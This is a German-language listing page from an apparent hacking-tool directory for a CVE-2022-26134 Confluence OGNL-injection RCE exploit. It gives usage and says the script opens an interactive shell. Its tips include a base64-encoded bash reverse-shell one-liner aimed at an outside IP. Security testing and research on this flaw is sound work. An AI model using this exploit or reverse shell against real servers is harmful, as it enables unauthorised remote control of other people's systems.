Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26134 — [CVE-2022-26134]Confluence-RCE durch OGNL-Expression-Injection mit Sandbox-Bypass. | Kitploit
Tools/GitHubGitHub/sncker/cve-2022-26134
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubsncker/cve-2022-26134

CVE-2022-26134

[CVE-2022-26134]Confluence-RCE durch OGNL-Expression-Injection mit Sandbox-Bypass.

Repository anzeigen
268vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-26134

Confluence OGNL expression injected RCE (CVE-2022-26134) PoC und Exploit

Aktualisierung

Sandbox-Umgehung hinzugefügt, höhere Versionen unterstützt.

Verwendung

root@kitploit:~
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/

Das Skript prüft automatisch, ob das Ziel verwundbar ist, und öffnet bei Verwundbarkeit eine pseudo-interaktive Shell.

Test unter Linux:
linux

Test unter Windows:
windows

Geben Sie 'q' ein, wenn Sie beenden möchten.

Einige Tipps

Befehlsargumente werden direkt an die runtime.exec-Methode übergeben, die keinen Shell-Kontext hat. Daher. Unter Windows können einige Befehle wie dir nicht direkt ausgeführt werden; verwenden Sie stattdessen cmd.exe /c dir. Unter Linux können einige Sonderzeichen nicht wirksam werden. Wenn Sie einen Befehl mit Sonderzeichen wie einer Reverse Shell ausführen müssen, können Sie ihn Base64-kodieren und dann bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i} verwenden.

Tool herunterladen